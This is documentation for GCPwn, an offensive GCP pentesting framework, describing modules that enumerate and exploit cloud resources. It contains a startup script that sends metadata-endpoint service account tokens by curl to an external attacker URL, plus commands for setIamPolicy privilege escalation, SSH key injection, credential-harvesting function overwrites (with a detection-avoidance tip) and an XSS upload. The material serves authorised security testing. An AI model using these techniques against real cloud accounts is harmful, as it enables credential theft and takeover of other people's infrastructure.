
5. Modules Guide


Overview

Modules are, per the name, "modular" components of code that can be run from the Python framework. They perform certain actions, and most will log/save permission information as you run them. The running tally of permissions is visible by calling creds info periodically while using the tool.

To list all modules run:

([project_ID]:[credential_name])> modules

To run any module, swap out <module_name> with a module name from the list above, and add the -h flag if you want to see all the supported flags.

([project_ID]:[credential_name])> modules run <module_name>

Module Organization + Searching

Modules are grouped by GCP service. For example, modules dealing with Cloud Storage (S3 buckets if you're coming from AWS) are under the "CloudStorage" directory in the "Modules" folder.

Modules are also split into several key categories. At this time these include:

  • Enumeration: Enumerate data. Includes all testIamPermissions API calls via the --iam flag, and can download content in some cases if supplied with --download or a similar flag.
  • Exploit: Perform a singular exploit attack such as setIamPolicy, implicit delegation, generating a service account key, etc.
  • Unauthenticated: Modules that require no credentials (ex. GCPBucketBrute from Rhino Security Labs).

You can list all modules via the modules command.


You can search for modules via modules search <keyword>.


You can get information about a module with modules info <module_name>.


Module Common Flags

Many modules also have the following flags:

  • -h/-v: Help flag to see all options & increased verbosity flag, respectively
  • --iam: Call testIamPermissions on the impacted resource and add whatever permissions are returned to the credential profile (seen via creds info in the tool). For example, modules run enum_buckets --iam will enumerate buckets AND call testIamPermissions for each bucket from both an authenticated & unauthenticated perspective, logging the results. Run modules run enum_all --iam to run all enumeration modules with all testIamPermissions calls possible. A short sketch of this API call follows this list.
  • --project-ids: Most of the time the tool will default to the project ID shown at the workspace prompt, or try all known project IDs. If you want to check specific projects instead, pass in --project-ids project1,project2,project3 to override this in most cases
  • --download (--take-screenshot/--download-serial for Compute): Download/gather whatever content is being enumerated (ex. blobs for buckets, or source code for functions) to the local file system under GatheredData unless otherwise specified
  • --output: Save the downloaded data to a folder other than the default "GatheredData" directory
  • --[resource_name]: Most enumeration modules will first try to LIST all resources, then try to GET each individual resource (in order to test if the permission is allowed). To target a specific resource and skip the list step, most modules allow you to supply the specific resource name you want to fetch. Most modules accept resources in the format projects/[project_id]/locations|zones/[location|zone]/[resource_type]/[resource_name], i.e. all the data encapsulated in one string separated by "/" characters. The -h for the respective module should tell you how to pass in the info.
  • --minimal-calls: Just call the LIST APIs and NOT the GET APIs. Faster, with fewer API calls.
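For context, here is a minimal sketch of what an --iam check against a single bucket roughly boils down to, using the google-cloud-storage client (the permission list is illustrative, not GCPwn's exact set):

# Hedged sketch: an --iam style check against one bucket.
# The permissions tested here are examples, not GCPwn's exact list.
from google.cloud import storage

client = storage.Client()
bucket = client.bucket("[bucket_name]")

granted = bucket.test_iam_permissions([
    "storage.objects.list",
    "storage.objects.get",
    "storage.buckets.setIamPolicy",
])
print(granted)  # testIamPermissions returns the subset the caller actually holds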

No Module Flags

Most modules should be runnable without any flags specified. If a user calls an exploit module with no flags (ex. modules run exploit_storage_setiampolicy), then the tool will pull from its internal database of data enumerated thus far and walk the user through an exploitation wizard. An example is given below:

([project_ID]:[credential_name])> modules run exploit_storage_setiampolicy
> Choose an existing from below to update it to later invoke and get the sa creds:
> [1] [bucket_name_1]
> [2] [bucket_name_2]
> [3] [bucket_name_3]
> [4] Exit
> Choose an option: 1
> Do you want to use an enumerated SA, or enter a new email?
> [1] Existing SA
> [2] New Member
> [3] Exit
> Choose an option: 2
> Provide the member account email below in the format user:<email> or serviceAccount:<email>: user:[personal_email]
> A list of roles are supplied below. Choose one or enter your own:
> [1] roles/storage.admin (Default)
> [2] roles/storage.objectCreator
> [3] roles/storage.objectViewer
> [4] roles/storage.objectUser
> [5] roles/storage.objectAdmin
> [6] roles/storage.folderAdmin
> [7] roles/storage.hmacKeyAdmin
> [8] roles/storageinsights.admin
> [9] roles/storageinsights.viewer
> [10] roles/storage.insightsCollectorService
> [11] Different Role
> [12] Exit
> Choose an option: 1
[*] Binding Member user:[personal_email] on [bucket_1] to role roles/storage.admin
[*] Successfully added user:[personal_email] to the policy of bucket [bucket_1]

Individual Module Descriptions

Services That Support Resource-Based Policies

Certain resources in GCP allow one to set IAM policies at the resource level as opposed to just at the project level. For example, you can set a policy for Google Cloud Storage at the project level to cover all buckets in that project, or you can specify a policy on individual buckets to make the permissions more granular as needed. A list of resources that support resource-level policies can be found here: https://cloud.google.com/iam/docs/resource-types-with-policies.

[Exploit] exploit_[service_name]_setiampolicy

Overview: Set the IAM policy for orgs/projects/folders or for a resource that supports resource-level policies. The module will try appending the given member/service account to the existing IAM policy under the specified role. This can allow privilege escalation. For example, if User A has the viewer role + the resourcemanager.projects.setIamPolicy permission, they could call exploit_projects_setiampolicy on the project to add themselves to the project under the owner role.

Before SetIAMPolicy on Project ABC

member: coolguy
roles:
   - roles/viewer
   - roles/customRole # Allows resourcemanager.projects.setIamPolicy

After SetIAMPolicy on Project ABC

member: coolguy
roles:
   - roles/viewer
   - roles/customRole # Allows resourcemanager.projects.setIamPolicy
   - roles/owner

Append vs Overwrite: By default the tool will always try to append your member/role combo to the existing policy. If it cannot do that due to lack of read permissions on the current policy, or you just want to remove existing policy info, pass in the --overwrite flag to potentially overwrite the entire policy with just your member/role combo. Note this is much more destructive, so be careful with it. A sketch of the append flow follows.
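As a rough illustration of the append flow (not GCPwn's internal code), a read-modify-write against a bucket with google-cloud-storage looks something like this; an overwrite would skip the read and push a policy containing only your binding:

# Sketch of append-style setIamPolicy on a bucket: read the existing policy,
# add a binding, write it back. Lacking read access here is what forces overwrite.
from google.cloud import storage

client = storage.Client()
bucket = client.bucket("[bucket_name]")

policy = bucket.get_iam_policy(requested_policy_version=3)  # requires read access
policy.bindings.append({
    "role": "roles/storage.admin",
    "members": {"user:coolbeans@[domain]"},
})
bucket.set_iam_policy(policy)  # existing bindings preserved, ours appended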

Common Use Cases

  • Try to append coolbeans as storage admin to the specified bucket in Google Storage
modules run exploit_storage_setiampolicy --member user:coolbeans@[domain] --roles "roles/storage.admin" --bucket [bucket_name]
  • Try to overwrite the existing policy with coolbeans as storage admin to the specified bucket in Google Storage
modules run exploit_storage_setiampolicy --member user:coolbeans@[domain] --roles "roles/storage.admin" --bucket [bucket_name] --overwrite
  • Try to append coolbeans as owner to the specified project
modules run exploit_project_setiampolicy --member user:coolbeans@[domain] --roles "roles/owner" --project-ids [project_name]

Everything

These modules are more miscellaneous or cover all resources enumerated thus far as opposed to a specific service.

[Enumeration] enum_all

Overview: Calls ALL enumeration modules; this is usually the go-to if you are trying to determine the permission level of a set of credentials.

Order of Operations: The following sequence of events occurs when running enum_all:

  1. Call enum_resources to try to find any additional projects/folders/organizations. If more projects are found, it automatically runs all subsequent enumeration modules on the newly identified projects as well, ensuring complete coverage.
  2. Call the following modules on all projects at this point:
    1. Cloud Compute --> enum_instances
    2. Cloud Compute --> enum_compute_projects
    3. Cloud Functions --> enum_functions
    4. Cloud Storage --> enum_hmac_keys
    5. Cloud Storage --> enum_buckets
    6. IAM --> enum_service_accounts
    7. IAM --> enum_custom_roles
  3. At the very end, call enum_policy_bindings to try to get ALL IAM bindings on ALL resources enumerated thus far.

Additional flags: Pass in the following flags to run the equivalent operations across all enumeration modules:

  1. --iam: Call testIamPermissions for every enumeration module that supports it
    1. --all-permissions: Call testIamPermissions for enum_resources (projects/folders/orgs) but pass in around 9000 permissions instead of the smaller default set
  2. --download: Download bucket blobs, take cloud compute screenshots, download cloud compute serial logs, download cloud function source code.

Common Use Cases

  • Enumerate all resources
modules run enum_all
  • Enumerate all resources and perform testIamPermissions where applicable. Try downloading data too.
modules run enum_all --iam --download

[Process] process_iam_bindings

Overview: This will take all the IAM bindings you have enumerated thus far and condense them into a single dictionary structure. Note this all happens offline; no GCP calls should be made, as it's just inspecting the data you already collected. So while before you might have one policy binding for scott on bucket 123 and another policy binding for scott on bucket 456, process_iam_bindings will turn this into one database row with a dictionary representing both policies (see the sketch below). You can add --txt or --csv to get the data structure in an easy-to-read txt or csv file in GatheredData. If you don't want the STDOUT output, you can pass in --silent.
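The condensation idea in an illustrative-only sketch (the names and shapes below are hypothetical, not GCPwn's actual schema):

# Illustrative only: fold per-resource bindings into one structure per member.
from collections import defaultdict

rows = [  # (member, resource, role) rows as enum_policy_bindings might store them
    ("user:scott", "bucket_123", "roles/storage.objectViewer"),
    ("user:scott", "bucket_456", "roles/storage.admin"),
]

summary = defaultdict(lambda: defaultdict(set))
for member, resource, role in rows:
    summary[member][resource].add(role)

# One entry per member, covering every resource/role pair seen so far
print({m: {r: sorted(v) for r, v in res.items()} for m, res in summary.items()})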

Prerequisite: To process IAM bindings, you need to have IAM bindings enumerated. Run modules run enum_policy_bindings before running this module.

Inheritance + Convenience Roles: process_iam_bindings will show all inherited roles + dynamically resolve any convenience roles (Ref: https://cloud.google.com/storage/docs/access-control/iam#convenience-values) if applicable. It is clearly denoted in the final summary whether the role for the user comes from inheritance or convenience.

Common Use Cases

  • Print the policy summary for each user to STDOUT
modules run process_iam_bindings
  • Turn off STDOUT and save the policy summary for each user to a txt and csv file
modules run process_iam_bindings --silent --txt --csv

[Enumeration] analyze_vulns

Overview: This module is still being expanded. As of now it will:

  1. Call out resources with allUsers or allAuthenticatedUsers members
  2. Review all roles from process_iam_bindings and flag all direct/inherited individual roles that represent violations (ex. Create Service Account Key)
  3. Review all roles from process_iam_bindings and flag all direct/inherited groupings of roles that represent violations (ex. Create Cloud Function)
  4. Review all individual permissions normally visible via creds info for any permission violations

Like process_iam_bindings, you can pass in --txt or --csv to write the output to GatheredData in either format.

Prerequisite: To analyze IAM bindings, you need processed IAM bindings. Run modules run process_iam_bindings before running this module.

Common Use Cases

  • Analyze all vulns thus far
modules run analyze_vulns
  • Analyze all vulns thus far silent + txt/csv output
modules run analyze_vulns --silent --txt --csv

[Process] generate_graph

Overview: Use Matplotlib and networkx to try to generate a graphical representation of the projects/folders/organizations enumerated thus far. Note this is helpful when correlating a project name (projects/#) to a project ID (project_string).

Prerequisite: To generate the graph, the tool assumes enum_resources ran successfully and folder/org/project names were populated.

Deleted: Pass in --show-deleted to show all the nodes including those projects/folders/orgs marked for deletion.
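A toy sketch of the graphing approach (the node names are made up; GCPwn builds the graph from its internal database instead):

# Toy example of the Matplotlib + networkx rendering; nodes are hypothetical.
import matplotlib.pyplot as plt
import networkx as nx

g = nx.DiGraph()
g.add_edge("organizations/111111", "folders/222222")
g.add_edge("folders/222222", "projects/333333 (my-project-id)")

nx.draw(g, with_labels=True, node_color="lightblue", font_size=8)
plt.show()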

Cloud Storage

[Enumeration] enum_buckets

Overview: The module enumerates buckets AND the corresponding blobs in each bucket. Per the help menu, both a bucket name & blob name, or a file of bucket names and a file of blob names, can be supplied via --buckets/--blobs & --buckets-file/--blob-file respectively. While all blobs are saved in the database, up to 10 blobs are displayed in the final summary output.

Permissions: Use the --iam flag to call testIamPermissions on the specified bucket, both authenticated and unauthenticated. Permissions are not checked for each blob due to the sheer number of blobs there might be. You can see the summary of permissions found via creds info [--csv].

Downloads: Use the --download flag to download every blob in a bucket if permissions allow. Since there can be so many blobs, you can use the following flags:

  • --file-size: Download only files that are under the file size limit.
  • --good-regex: Download only files matching the python re regex. For example, only download files ending with the ".txt" extension
  • --time-limit: Run GET/testIamPermissions/download API calls on a given bucket for a maximum time limit. If the time limit is reached, GCPwn moves on to the next bucket regardless of whether it has finished checking every blob in the current bucket.

HMAC Keys: Given an HMAC key for a service account, pass in the key and secret via --access-id and --hmac-secret. enum_buckets will then try to leverage the GCP XML API via SigV4 requests to list and get bucket/blob data (a sketch of this approach follows). You can also pass in these flags with --download to try to download content via the XML API SigV4 calls as opposed to the normal method. If you have no access IDs/HMAC secrets but have the 'storage.hmackeys.create' permission, review the "exploit_storage_hmac" module to create a set of keys that you can then use with this enumeration module. If you want to see the HMAC keys that are available to your user, you can pass in the --list-hmac-secrets flag. Note that at this point in time, enumerating GCP storage endpoints with HMAC keys leverages AWS-style headers since those are supported :)
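A minimal sketch of that SigV4 interoperability trick, assuming boto3 pointed at the GCS XML endpoint (this is the underlying idea, not GCPwn's actual implementation):

# Sketch: listing a bucket over GCS's S3-interoperable XML API with an HMAC
# key pair, letting boto3 handle the SigV4 signing. Values are placeholders.
import boto3

s3 = boto3.client(
    "s3",
    endpoint_url="https://storage.googleapis.com",
    aws_access_key_id="[access_id]",        # GCS HMAC access ID
    aws_secret_access_key="[hmac_secret]",  # GCS HMAC secret
    region_name="auto",                     # region is largely ignored by GCS
)

for obj in s3.list_objects_v2(Bucket="[bucket_name]").get("Contents", []):
    print(obj["Key"])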

Common Use Cases

  • Enumerate all buckets, don't do any IAM checks, don't download any data
modules run enum_buckets
  • See if any HMAC secrets have been stored via previous calls to exploit_storage_hmac
modules run enum_buckets --list-hmac-secrets
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, don't download any data
modules run enum_buckets --iam
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, download any data
modules run enum_buckets --iam --download 
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, download any data ending with ".sh"
modules run enum_buckets --iam --download --good-regex "\.sh"
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, download any data via the HMAC XML SigV4 API, but ONLY use LIST APIs (i.e. use fewer API calls to get the same data)
modules run enum_buckets --iam --download --access-id <access_id> --hmac-secret <hmac_secret> --minimal-calls

[Enumeration] enum_hmac_keys

Overview: The module enumerates HMAC keys. Note HMAC key secrets can ONLY be retrieved when creating the HMAC key via the API, so this module won't give you back HMAC key secrets. HMAC keys can also be viewed via the Interoperability settings in Cloud Storage. In short, you can bind HMAC keys to a service account and use them to generate generic SigV4 requests that fetch bucket contents with the permissions of that service account. If you want to read more about the feature, see https://cloud.google.com/storage/docs/authentication/hmackeys#overview


Common Use Cases

  • Enumerate all HMAC keys. Note this won't include HMAC secrets as those only appear for the "create" API
modules run enum_hmac_keys

[Exploit] exploit_bucket_upload

Overview: This is just a wrapper to let one upload a local file (or STDIN) to a GCP bucket. Depending on how the bucket is used, this might assist a pentester; for example, if one can overwrite the source code for a GCP function, or change files being used by a website, etc. One can supply the local file to upload and the remote path to upload it to via the command line arguments --local-blob-path & --remote-blob-path. One can supply data to write to --remote-blob-path via STDIN by passing in the data in Base64 format with --data-string-base64 (a sketch for producing the Base64 payload follows the examples below). Note the remote blob path can include directories (ex. directory1/directory2/myfileimuploading.txt). Note the bucket name supplied also does not need the gs:// format; it's just the bucket name.

  • Supply no arguments to prompt wizard walkthrough
modules run exploit_bucket_upload
  • Upload the local "myfile.txt" to [bucket_name] under a new directory at newdirectory/myfile.txt supplying all necessary arguments
modules run exploit_bucket_upload --bucket [bucket_name] --local-blob-path /home/kali/Desktop/myfile.txt --remote-blob-path newdirectory/myfile.txt
  • Upload <script>alert(0)</script> to an HTML document in the bucket
modules run exploit_bucket_upload --bucket [bucket_name] --data-string-base64 "PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==" --remote-blob-path static/assets/myfile.html
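For reference, the Base64 payload in the last example can be produced like so:

# Producing the --data-string-base64 value for the XSS example above.
import base64

print(base64.b64encode(b"<script>alert(0)</script>").decode())
# PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==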

[Exploit] exploit_storage_hmac

Overview: Create an HMAC key for a given service account (--create), enable an already existing HMAC key (--update --state ACTIVE), or disable an already existing HMAC key (--update --state INACTIVE). If creating an HMAC key, the service account email can be provided via --sa-email. Note per GCP documentation, one ONLY gets the HMAC key secret when creating an HMAC key (a sketch of the underlying create call follows). A created HMAC key, including the secret, will be saved to the internal database for later use if needed and will pop up in wizard prompts. If a user chooses to make an HMAC key, the module will automatically ask at the end if you want to use the newly created key/secret to try to enumerate all bucket content; otherwise you can call enum_buckets later and supply the --access-id and --hmac-secret manually. Finally, as a shortcut, you can see all existing known secrets for the workspace with modules run enum_buckets --list-hmac-secrets.
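For context, the create operation maps to a single client call; a minimal sketch with google-cloud-storage (the secret is only returned at creation time, matching the module's behavior):

# Sketch of the underlying HMAC key creation; the secret cannot be re-fetched.
from google.cloud import storage

client = storage.Client()
metadata, secret = client.create_hmac_key(
    service_account_email="[name]@[project].iam.gserviceaccount.com"
)
print(metadata.access_id)  # usable later as --access-id
print(secret)              # usable later as --hmac-secret; save it now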

  • Prompt wizard walkthrough (will pull data from enumerated data thus far when presenting choices)
modules run exploit_storage_hmac
  • Create a HMAC key for the given service account. Secret returned in this case and stored in database
modules run exploit_storage_hmac --create --sa-email [name]@compute-system.iam.gserviceaccount.com 
  • Re-enable (update to "ACTIVE") a previously disabled HMAC key
modules run exploit_storage_hmac --update --state "ACTIVE" --access-id [access-id]

[Unauthenticated] unauth_bucketbrute

Overview: This is GCPBucketBrute from Rhino Security Labs, which uses a keyword and associated permutations to brute force bucket names. If a bucket name is found, it checks what anonymous permissions are allowed. At this point in time the module only does unauthenticated permission checks when given a key name. Note this is a standalone copy/paste of that tool, so it does NOT save any data to the internal databases at this point in time.

  • Try to find any buckets with the keyword and check for unauthenticated permissions if found
modules run unauth_bucketbrute --key company_keyword

Cloud Compute

[Enumeration] enum_instances

Overview: The module tries to enumerate all instances. By default it will try to get the instances in all zones so you usually won't need to specify a flag. That being said, you can specify specific zone flags if you want to scope this down to specific zones as follows:

  • --all-zones: A bit redundant but this will use all the zones in utils-->zones.txt if you want a clear list of zones to check against.
  • --zones-list: Provide a list of zones via the command line, --zones-list zone1,zone2,zone3
  • --zones-file: Provide a file with list of zones to try, one per line

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified instance.

Downloads: If you have the permissions, you can try taking a screenshot via "--take-screenshot" and/or downloading the serial logs via "--download-serial". Downloading the serial logs will save the logs to a txt file with the timestamp appended in case you perform multiple downloads.
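A short sketch of the serial log fetch, assuming the google-cloud-compute client (the screenshot path uses the analogous getScreenshot API):

# Sketch: pulling serial port output for one instance; identifiers are placeholders.
from google.cloud import compute_v1

instances = compute_v1.InstancesClient()
output = instances.get_serial_port_output(
    project="[project_id]", zone="[zone]", instance="[instance_name]"
)
print(output.contents)  # raw serial console log text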

Common Use Cases

  • Enumerate all instances, don't do any IAM checks, don't download any data
modules run enum_instances
  • Enumerate all instances, perform IAM checks from auth perspective, don't download any data
modules run enum_instances --iam
  • Enumerate all instances, perform IAM checks from auth perspective, download any data
modules run enum_instances --iam --take-screenshot --download-serial

[Enumeration] enum_compute_projects

Overview: GCP Compute has its own definition of the "project" entity in GCP. Namely, it includes the metadata attributes that might contain SSH keys, enable-oslogin settings, etc. This is a standalone enumeration module and is needed if you want to try correlating data for some exploit modules.

Common Use Cases

  • Get the current project info as a compute object
modules run enum_compute_projects
  • Get the specified project info as a compute object
modules run enum_compute_projects --project-ids <project_name>

[Exploit] exploit_instance_startup_script

Overview: Compute instances allow you to specify startup scripts in a specific metadata key that will run when an instance first boots. Thus, with the necessary permissions you could create an instance (--create-new-instance), attach a service account to it (--service-account), and start the instance with a startup script that exfiltrates the service account info from the compute metadata endpoints to an external URL you control (--external-url). This exploit module seeks to automate all of that.

Startup Script: The current startup script used is shown below:

#!/bin/bash
apt-get update
apt-get install -y curl
curl {external_url}/gce_token -k -d "$(curl --header "Metadata-Flavor:Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token)"
curl {external_url}/scopes -k -d "$(curl --header "Metadata-Flavor:Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes)"
curl {external_url}/email -k -d "$(curl --header "Metadata-Flavor:Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email)"

Note you need to supply the --external-url argument pointing to wherever you will capture the credentials when they are exfiltrated on instance startup (ex. a Burp Collaborator link). To run your own code, you can specify your own startup script with --startup-script-path.

Create vs Update: Ideally you would create a brand new compute instance with the service account credentials; to do so, pass in --create-new-instance. Note the tool also supports the update operation via --update-via-shutdown. However, at this point in time it WILL restart the machine and WILL wipe all the previous data/metadata, so this is the more destructive, less ideal option.

[Exploit] exploit_instance_ssh_keys

Overview: This module will attempt to upload SSH key(s) either to the metadata of the project that contains the targeted instance, or to the metadata of the instance itself. Once the module is done, you can try SSHing into the instance using the private half of the key pair whose public key you just uploaded.

SSH Keys: You can pass in the SSH key either through the command line Base64-encoded, or via a file containing the key. For example, if you create the SSH key via the ssh-keygen command shown below, you would pass in --ssh-key-file /home/kali/.ssh/connection-test.pub to upload the public portion of the SSH key. Note that GCP also wants the username tied to the SSH key, so pass that in via --username; in the example below the username would be "test1234".

Instance vs Project: Specify either instance with --instance-level or project with --project-level when writing the metadata. Writing the SSH key to the instance means you can JUST SSH into that instance. Writing the SSH key to the project means you can potentially SSH into ALL the compute instances in that project.

Append vs Overwrite: The module by default will try to append the SSH keys to the ssh-keys metadata value if it already exists. If you want to overwrite the keys AND ALL INSTANCE METADATA, then pass in --brute.

  • Generating an SSH Key Pair
> ssh-keygen -t rsa -f /home/kali/.ssh/connection-test -C test1234 -b 2048
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/connection-test
Your public key has been saved in /home/kali/.ssh/connection-test.pub
> cat ~/.ssh/connection-test.pub                                    
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8rt9P8MG+XW7ZUhirFonlEmuqbuoqupK5shkhjQAI58l[TRUNCATED] test123                       
  • Provide no arguments and walk through wizard
modules run exploit_instance_ssh_keys
  • Add the SSH key at the specific instance level
modules run exploit_instance_ssh_keys --instance-level --instance-name projects/[project_id]/zones/[zone_id]/instances/[instance_name] --ssh-key-file "file_path" --username kali
  • Example Run
([project-name]:scott)> modules run exploit_instance_ssh_keys --project-level --ssh-key-file /home/kali/.ssh/connection-test.pub  --username test1234
> Choose an existing project from below to set the IAM policy:
> [1] [project-name]
> [2] Exit
> Choose an option: 1
{'kind': 'compute#metadata', 'items': [{'key': 'ssh-keys', 'value': 'test1234:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8rt9P8MG+XW7ZUhirFonlEmuqbuoqupK5shkhjQAI58lnBrMf[TRUNCATED] test1234'}], 'fingerprint': 'CmjRNy8b_Jg='}

> ssh -i ~/.ssh/connection-test test1234@[external_ip]
[TRUNCATED] #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
test1234@instance-20[TRUNCATED]:~$ whoami
test1234

Cloud Functions

[Enumeration] enum_functions

Overview: The module enumerates V1 & V2 functions. By default it will try to get the functions in all regions, so you usually won't need to specify a flag. That being said, you can specify region flags if you want to scope this down to specific regions as follows:

  • --v1-regions: Just check regions associated with V1 functions.
  • --v2-regions: Just check regions associated with V2 functions.
  • --v1v2-regions: Essentially the default behavior, but goes through the V1+V2 regions per file
  • --regions-list: Provide a list of regions via the command line, --regions-list region1,region2,region3
  • --regions-file: Provide a file with a list of regions to try, one per line

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified function.

Downloads: Use the --download flag to download the source code for each function. At this time this only supports source code stored in Google Cloud Storage; GitHub/repository-hosted source is not supported yet but is in progress.

External curl: Use the --external-curl flag to try sending a curl request to the given function, either by trying its URL attribute or by trying a URL based off the function name. A successful response is logged in case you want that info.

Common Use Cases

  • Enumerate all functions, don't do any IAM checks, don't download any data
modules run enum_functions
  • Enumerate all functions, perform IAM checks from auth perspective, don't download any data
modules run enum_functions --iam
  • Enumerate all functions, perform IAM checks from auth perspective, download any data
modules run enum_functions --iam --download 
  • Enumerate all functions in given region, perform IAM checks from auth perspective, do external curl to see if URL is live, download any data and save it to functions_data directory
modules run enum_functions --iam --download --regions-list us-central1,us-central2 --external-curl --output functions_data

[Exploit] exploit_functions_invoke

Overview: Call a V1 or V2 cloud function either by creating a function (--create) or updating an existing one (--update). Note you can also use this module to just invoke functions (--invoke) in general if you want to execute some other arbitrary code. Note there is no official GCP API to call the V2 cloud function, so I use some Python requests magic to call it; a sketch of that idea follows the flag descriptions below.

Setup Bucket: To create or update a function, you need to upload your code to that function by pointing the function to a Google Cloud Storage bucket. You can either host the ZIP on a bucket in your own account, or GCPwn lets you upload the code to a bucket in the target account. Either way, you can specify a source via --bucket-src gs://[mybucketname]/myfile.zip. Supplying no flag will prompt the tool to ask if you want to upload the ZIP file to a bucket in the target account. In terms of ZIP files to use, the codev1v2.zip file in the Modules-->CloudFunctions-->utils folder will return the credentials and emails for an attached service account and is the default code the tool is built around.

Service Account: Choose a service account to tie to the cloud function when creating/updating it via the --service-account flag. Note if you are CREATING a new function, there is no way to specify no service account: per the SDK, it will by default always attach the default service account with its Editor permissions.

V1 or V2: The tool will usually prompt or auto-detect which version the function is, especially if it already exists/has been enumerated. However, if you know the version, pass in --v1 or --v2 to speed things up. Note if you choose the wrong version you might get a 404, so you can always try the other version.

Create or Update: Choose to create a function (--create) or update a function (--update) with your code. Note updating will WIPE all of the previous code and replace it with your Python code, so it is a bit destructive. A less direct alternative might be to download the source code via modules run enum_functions --download, unzip the source code, edit it to include the logic of codev1v2.zip, and point to that code to help avoid detection.

Invoke & Assume: Just because you create/update a function with code does not mean it's executed. To actually invoke/call a function, add the --invoke flag, which will return the function response. If you are using the default codev1v2.zip, then creds should be returned, and additionally adding the --assume-creds flag will auto-add and switch your current user in GCPwn to the newly returned credentials.
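A hedged sketch of that "requests magic" idea for hitting a function URL directly (the URL format and token acquisition below are assumptions for illustration; function endpoints generally expect an identity token for the caller):

# Sketch: invoking a function endpoint directly with an identity token.
import requests

FUNCTION_URL = "https://[region]-[project_id].cloudfunctions.net/[function-name]"
ID_TOKEN = "[identity_token]"  # e.g. from `gcloud auth print-identity-token`

resp = requests.post(
    FUNCTION_URL,
    headers={"Authorization": f"Bearer {ID_TOKEN}"},
    timeout=30,
)
print(resp.status_code, resp.text)  # with codev1v2.zip this would include SA creds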

  • Begin the interactive prompts
modules run exploit_functions_invoke
  • Call/Invoke an existing specified function (no creation/update/assume/etc)
modules run exploit_functions_invoke --function-name projects/[project_id]/regions/[region]/functions/[function-name]  --invoke
  • Call/Invoke a function (no creation/update/assume/etc) and let the tool return a list of possible functions to call
modules run exploit_functions_invoke --invoke
  • Create a new function (by default will have service account with editor creds), call the newly created function, and assume the creds
modules run exploit_functions_invoke --create --v2 --function-name projects/[project_id]/regions/[region]/functions/[new-function-name] --bucket-src gs://[mybucket]/myfile.zip --invoke --assume-creds
  • Update an existing function, call the newly created function, and assume the creds
modules run exploit_functions_invoke --update --function-name projects/[project_id]/regions/[region]/functions/[existing-function-name] --bucket-src gs://[mynewbucket]/myfile.zip --invoke --assume-creds

Resource Manager

[Enumeration] enum_resources

Overview: Enumerates all projects, folders, and organizations. Tries to both list projects/folders/orgs as well as search for projects/folders/orgs using a recursive tree to see if any additional resources can be found.

Project/Folder/Org: Scope down the enumeration to just projects/folders/orgs via the --projects, --folders, and --organizations flags. Note one can combine these with --iam to just enumerate IAM permissions for each resource.

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified project/folder/org. Note this module also includes the --all-permissions flag, which passes in ~9000 permissions to check for each individual project/folder/org. This can take a while due to the large number of permissions and the need to batch requests per GCP limits.

  • Enumerate all projects/folders/organizations
modules run enum_resources
  • Enumerate all projects/folders/organizations but don't try the recursive tree (fewer API calls)
modules run enum_resources --no-recursive
  • Enumerate all projects/folders/organizations and get their IAM permissions
modules run enum_resources --iam
  • Enumerate all folders, and check for EVERY IAM permission (~9K) for each folder
modules run enum_resources --folders --iam --all-permissions

IAM

[Enumeration] enum_custom_roles

Overview: Attempt to enumerate all custom roles in the GCP account. The ability to enumerate custom roles allows gcpwn to store the role definition for later reference when doing analysis. At this point in time only project-level custom roles are enumerated (organization-level custom roles are not checked).

  • Try to enumerate all custom roles at the project level. Definitions will be stored for later reference
modules run enum_custom_roles

[Enumeration] enum_policy_bindings

Overview: For every resource enumerated thus far (organizations/folders/projects/buckets/functions/instances/service accounts), try to retrieve the respective IAM policy bindings. Note this module is necessary if you want to start doing analysis with all the policy bindings to find role violations. Since there is no "list_users" API call in GCP, getting policy bindings will also passively add user entities found to the internal database for later use during prompting.

  • Try to get policy bindings for all resources enumerated thus far
modules run enum_policy_bindings

[Enumeration] enum_service_accounts

Overview: Enumerate service_accounts and service account keys. Note the secret portion of a service account key is only returned during the creation API call. See exploit_service_account_keys for more details.

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified service account.

  • Enumerate service_accounts & service_keys
modules run enum_service_accounts
  • Enumerate service_accounts & service_keys, call authenticated testIamPermissions on service_accounts, make minimal API calls
modules run enum_service_accounts --iam --minimal-calls

[Exploit] exploit_service_account_keys

Overview: Create a service account key for a specified service account via the --create flag and assume the new credentials with --assume. You can also update the status of an existing key by either disabling or enabling it via the --disable or --enable flags respectively. A rough REST sketch of the create call follows.
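A rough REST sketch of the key-creation call this module wraps (the returned privateKeyData is the base64-encoded service account JSON key):

# Sketch: creating a service account key via the IAM REST API directly.
# ACCESS_TOKEN / SA_EMAIL are placeholders for the caller's token and target SA.
import base64
import requests

ACCESS_TOKEN = "[access_token]"
SA_EMAIL = "[email]"

resp = requests.post(
    f"https://iam.googleapis.com/v1/projects/-/serviceAccounts/{SA_EMAIL}/keys",
    headers={"Authorization": f"Bearer {ACCESS_TOKEN}"},
)
key_json = base64.b64decode(resp.json()["privateKeyData"])
print(key_json.decode())  # a usable credential file for the service account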

  • Prompt the wizard to begin the exploit path
modules run exploit_service_account_keys
  • Create a new service account key and assume the new credentials
modules run exploit_service_account_keys --create --sa [email] --assume

[Exploit] exploit_generate_access_token (Implicit Delegation)

Overview: Generate an access token for the given service account. To directly generate an access token for a targeted service account, pass in the service account email via the --target-sa flag.

